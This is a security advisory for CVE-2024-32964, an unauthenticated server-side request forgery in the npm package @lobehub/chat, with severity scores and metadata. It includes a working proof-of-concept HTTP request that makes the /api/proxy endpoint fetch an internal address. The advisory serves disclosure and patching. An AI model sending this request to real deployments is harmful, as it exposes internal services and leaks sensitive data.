CVE-2024-32964 – @lobehub/chat

Package

Manager: npm
Name: @lobehub/chat
Vulnerable Version: >=0 <0.150.6

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:H/SC:H/SI:L/SA:H

EPSS: 0.23095 pctl0.95713

Details

lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability ### Summary The latest version of lobe-chat(by now v0.141.2) has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information. ### Details * visit https://chat-preview.lobehub.com/settings/agent * you can attack all internal services by /api/proxy and get the echo in http response :)    ### PoC ```http POST /api/proxy HTTP/2 Host: xxxxxxxxxxxxxxxxx Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346846.0.0.0 Content-Length: 23 Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123" Sec-Ch-Ua-Platform: "Windows" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: https://chat-preview.lobehub.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://chat-preview.lobehub.com/settings/agent Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7 http://172.23.0.1:8000/ ``` ### Impact SSRF ,All users will be impacted.

Metadata

Created: 2024-05-10T15:29:51Z
Modified: 2024-05-14T20:03:54Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-mxhq-xw3g-rphc/GHSA-mxhq-xw3g-rphc.json
CWE IDs: ["CWE-918"]
Alternative ID: GHSA-mxhq-xw3g-rphc
Finding: F100
Auto approve: 1